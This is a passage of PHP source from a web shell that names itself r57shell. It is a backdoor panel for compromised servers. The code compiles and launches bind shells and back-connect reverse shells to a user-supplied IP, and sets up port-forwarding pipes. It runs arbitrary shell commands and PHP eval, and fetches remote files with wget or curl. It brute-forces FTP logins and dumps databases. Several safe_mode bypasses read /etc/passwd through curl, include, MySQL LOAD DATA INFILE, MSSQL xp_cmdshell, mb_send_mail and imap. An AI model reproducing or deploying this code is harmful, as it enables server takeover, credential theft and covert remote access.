1755          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1756        }
1757       else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1758       }
1759       else if($_POST['action'] == "delete"){
1760       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1761       $_POST['cmd']="";
1762       }
1763      break;
1764    }
1765  }
1766 if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1767  {
1768  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1769  if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
1770  else {
1771  echo $table_up3;
1772  echo $font;
1773  echo "<form name=save_file method=post>";
1774  echo ws(3)."<b>".$_POST['e_name']."</b>";
1775  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1776  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1777  fclose($file);
1778  echo "</textarea>";
1779  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1780  echo "<input type=hidden name=dir value=".$dir.">";
1781  echo "<input type=hidden name=cmd value=save_file>";
1782  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1783  echo "</div>";
1784  echo "</font>";
1785  echo "</form>";
1786  echo "</td></tr></table>";
1787  exit();
1788  }
1789  }
1790 if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1791  {
1792  $mtime = @filemtime($_POST['e_name']);
1793  if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
1794  else {
1795  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1796  @fwrite($file,$_POST['e_text']);
1797  @touch($_POST['e_name'],$mtime,$mtime);
1798  $_POST['cmd']="";
1799  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1800  }
1801  }
1802 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1803 {
1804  cf("/tmp/bd.c",$port_bind_bd_c);
1805  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1806  @unlink("/tmp/bd.c");
1807  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1808  $_POST['cmd']="ps -aux | grep bd";
1809 }
1810 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1811 {
1812  cf("/tmp/bdpl",$port_bind_bd_pl);
1813  $p2=which("perl");
1814  if(empty($p2)) $p2="perl";
1815  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1816  $_POST['cmd']="ps -aux | grep bdpl";
1817 }
1818 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1819 {
1820  cf("/tmp/back",$back_connect);
1821  $p2=which("perl");
1822  if(empty($p2)) $p2="perl";
1823  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1824  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1825 }
1826 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1827 {
1828  cf("/tmp/back.c",$back_connect_c);
1829  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1830  @unlink("/tmp/back.c");
1831  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1832  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1833 }
1834 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1835 {
1836  cf("/tmp/dp",$datapipe_pl);
1837  $p2=which("perl");
1838  if(empty($p2)) $p2="perl";
1839  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1840  $_POST['cmd']="ps -aux | grep dp";
1841 }
1842 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1843 {
1844  cf("/tmp/dpc.c",$datapipe_c);
1845  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1846  @unlink("/tmp/dpc.c");
1847  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1848  $_POST['cmd']="ps -aux | grep dpc";
1849 }
1850 if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
1851 if (!empty($HTTP_POST_FILES['userfile']['name']))
1852 {
1853 if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1854 else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1855 @copy($HTTP_POST_FILES['userfile']['tmp_name'],
1856             $_POST['dir']."/".$nfn)
1857       or print("<font color=orange face=Fixedsys><div align=center>Malesef gulum Buraya Y&#252;kleyemezsin ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1858 }
1859 if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1860 {
1861  switch($_POST['with'])
1862  {
1863  case wget:
1864  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1865  break;
1866  case fetch:
1867  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1868  break;
1869  case lynx:
1870  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1871  break;
1872  case links:
1873  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1874  break;
1875  case GET:
1876  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1877  break;
1878  case curl:
1879  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1880  break;
1881  }
1882 }
1883 if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1884  {
1885  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1886  if(empty($ftp_port)) { $ftp_port = 21; }
1887  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1888  if(!$connection) { fe($language,0); }
1889  else
1890   {
1891   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
1892   else
1893    {
1894    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);    }
1895    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);  }
1896    }
1897   }
1898  @ftp_close($connection);
1899  $_POST['cmd'] = "";
1900  }
1901 if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
1902  {
1903  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1904  if(empty($ftp_port)) { $ftp_port = 21; }
1905  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1906  if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
1907  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
1908  @ftp_close($connection);
1909  }
1910 echo $table_up3;
1911 if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
1912 else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
1913 echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
1914 if($safe_mode)
1915 {
1916  switch($_POST['cmd'])
1917  {
1918  case 'safe_dir':
1919   $d=@dir($dir);
1920   if ($d)
1921    {
1922    while (false!==($file=$d->read()))
1923     {
1924      if ($file=="." || $file=="..") continue;
1925      @clearstatcache();
1926      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
1927      if($windows){
1928      echo date("d.m.Y H:i",$mtime);
1929      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
1930      }
1931      else{
1932      $owner = @posix_getpwuid($uid);
1933      $grgid = @posix_getgrgid($gid);
1934      echo $inode." ";
1935      echo perms(@fileperms($file));
1936      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1937      echo date("d.m.Y H:i ",$mtime);
1938      }
1939      echo "$file\n";
1940     }
1941    $d->close();
1942    }
1943   else echo $lang[$language._text29];
1944  break;
1945  case 'safe_file':
1946   if(@is_file($_POST['file']))
1947    {
1948    $file = @file($_POST['file']);
1949    if($file)
1950     {
1951     $c = @sizeof($file);
1952     for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
1953     }
1954    else echo $lang[$language._text29];
1955    }
1956   else echo $lang[$language._text31];
1957   break;
1958   case 'test1':
1959   $ci = @curl_init("file://".$_POST['test1_file']."");
1960   $cf = @curl_exec($ci);
1961   echo $cf;
1962   break;
1963   case 'test2':
1964   @include($_POST['test2_file']);
1965   break;
1966   case 'test3':
1967   if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
1968   $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1969   if($db)
1970    {
1971    if(@mysql_select_db($_POST['test3_md'],$db))
1972     {
1973      $sql = "DROP TABLE IF EXISTS temp_r57_table;";
1974      @mysql_query($sql);
1975      $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
1976      @mysql_query($sql);
1977      $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
1978      @mysql_query($sql);
1979      $sql = "SELECT * FROM temp_r57_table;";
1980      $r = @mysql_query($sql);
1981      while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
1982      $sql = "DROP TABLE IF EXISTS temp_r57_table;";
1983      @mysql_query($sql);
1984     }
1985     else echo "[-] ERROR! Can't select database";
1986    @mysql_close($db);
1987    }
1988   else echo "[-] ERROR! Can't connect to mysql server";
1989   break;
1990   case 'test4':
1991   if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
1992   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1993   if($db)
1994    {
1995    if(@mssql_select_db($_POST['test4_md'],$db))
1996     {
1997      @mssql_query("drop table r57_temp_table",$db);
1998      @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1999      @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
2000      $res = mssql_query("select * from r57_temp_table",$db);
2001      while(($row=@mssql_fetch_row($res)))
2002       {
2003       echo $row[0]."\r\n";
2004       }
2005     @mssql_query("drop table r57_temp_table",$db);
2006     }
2007     else echo "[-] ERROR! Can't select database";
2008    @mssql_close($db);
2009    }
2010   else echo "[-] ERROR! Can't connect to MSSQL server";
2011   break;
2012   case 'test5':
2013   if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
2014   $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
2015   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
2016   $lines = file ('/tmp/mb_send_mail');
2017   foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
2018   break;
2019   case 'test6':
2020   $stream = @imap_open('/etc/passwd', "", "");
2021   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
2022   for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
2023   @imap_close($stream);
2024   break;
2025   case 'test7':
2026   $stream = @imap_open($_POST['test7_file'], "", "");
2027   $str = @imap_body($stream, 1);
2028   echo $str;
2029   @imap_close($stream);
2030   break;
2031  }
2032 }
2033 else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
2034  $cmd_rep = ex($_POST['cmd']);
2035  if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
2036  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
2037 if ($_POST['cmd']=="ftp_brute")
2038  {
2039  $suc = 0;
2040  foreach($users as $user)
2041   {
2042   $connection = @ftp_connect($ftp_server,$ftp_port,10);
2043   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
2044   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
2045   @ftp_close($connection);
2046   }
2047  echo "\r\n-------------------------------------\r\n";
2048  $count = count($users);
2049  if(isset($_POST['reverse'])) { $count *= 2; }
2050  echo $lang[$language.'_text97'].$count."\r\n";
2051  echo $lang[$language.'_text98'].$suc."\r\n";
2052  }
2053 if ($_POST['cmd']=="php_eval"){
2054  $eval = @str_replace("<?","",$_POST['php_eval']);
2055  $eval = @str_replace("?>","",$eval);
2056  @eval($eval);}
2057 if ($_POST['cmd']=="mysql_dump")
2058  {
2059   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
2060   $sql = new my_sql();
2061   $sql->db   = $_POST['db'];
2062   $sql->host = $_POST['db_server'];
2063   $sql->port = $_POST['db_port'];
2064   $sql->user = $_POST['mysql_l'];
2065   $sql->pass = $_POST['mysql_p'];
2066   $sql->base = $_POST['mysql_db'];
2067   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
2068   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
2069   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
2070   else {
2071    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
2072    else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
2073    else { echo "[-] ERROR! Can't write in dump file"; }
2074    }
2075  }
2076 echo "</textarea></div>";
2077 echo "</b>";
2078 echo "</td></tr></table>";
2079 echo "<table width=100% cellpadding=0 cellspacing=0>";
2080 function up_down($id)
2081  {
2082  global $lang;
2083  global $language;
2084  return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
2085  }
2086 function div($id)
2087  {
2088  if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
2089  return '<div id="'.$id.'">';
2090  }
2091 if(!$safe_mode){
2092 echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
2093 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
2094 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2095 echo $te.'</div>'.$table_end1.$fe;
2096 }
2097 else{
2098 echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
2099 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
2100 echo $te.'</div>'.$table_end1.$fe;
2101 }
2102 echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
2103 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2104 echo $te.'</div>'.$table_end1.$fe;
2105 if($safe_mode){
2106 echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
2107 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2108 echo $te.'</div>'.$table_end1.$fe;
2109 }
2110 if($safe_mode && $unix){
2111 echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
2112 echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2113 echo $te.'</div>'.$table_end1.$fe;
2114 }
2115 if(!$safe_mode){
2116 foreach ($aliases as $alias_name=>$alias_cmd)
2117  {
2118  $aliases2 .= "<option>$alias_name</option>";
2119  }
2120 echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
2121 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2122 echo $te.'</div>'.$table_end1.$fe;
2123 }
2124 echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
2125 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2126 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2127 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2128 echo $te.'</div>'.$table_end1.$fe;
2129 if(!$safe_mode && $unix){
2130 echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
2131 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2132 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2133 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2134 echo $te.'</div>'.$table_end1.$fe;
2135 }
2136 echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
2137 echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
2138 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
2139 echo "</textarea>";
2140 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2141 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2142 echo "</div></div></font>";
2143 echo $table_end1.$fe;
2144 if($safe_mode&&$curl_on)
2145 {
2146 echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
2147 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2148 echo $te.'</div>'.$table_end1.$fe;
2149 }
2150 if($safe_mode)
2151 {
2152 echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
2153 echo "<table class=table1 width=100% align=center>";
2154 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2155 echo $te.'</div>'.$table_end1.$fe;
2156 }
2157 if($safe_mode&&$mysql_on)
2158 {
2159 echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
2160 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2161 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2162 echo $te.'</div>'.$table_end1.$fe;
2163 }
2164 if($safe_mode&&$mssql_on)
2165 {
2166 echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
2167 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2168 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2169 echo $te.'</div>'.$table_end1.$fe;
2170 }
2171 if($safe_mode&&$unix&&function_exists('mb_send_mail')){
2172 echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts;
2173 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2174 echo $te.'</div>'.$table_end1.$fe;
2175 }
2176 if($safe_mode&&function_exists('imap_list')){
2177 echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts;
2178 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2179 echo $te.'</div>'.$table_end1.$fe;
2180 }
2181 if($safe_mode&&function_exists('imap_body')){
2182 echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts;
2183 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2184 echo $te.'</div>'.$table_end1.$fe;
2185 }
2186 if(@ini_get('file_uploads')){
2187 echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2188 echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
2189 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2190 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2191 echo $te.'</div>'.$table_end1.$fe;
2192 }
2193 if(!$safe_mode&&!$windows){
2194 echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
2195 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2196 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2197 echo $te.'</div>'.$table_end1.$fe;
2198 }
2199 echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
2200 echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2201 $arh = $lang[$language.'_text92'];
2202 if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
2203 if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2204 if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2205 echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2206 echo $te.'</div>'.$table_end1.$fe;
2207 if(@function_exists("ftp_connect")){
2208 echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2209 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2210 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2211 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2212 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2213 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2214 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2215 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2216 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2217 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2218 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
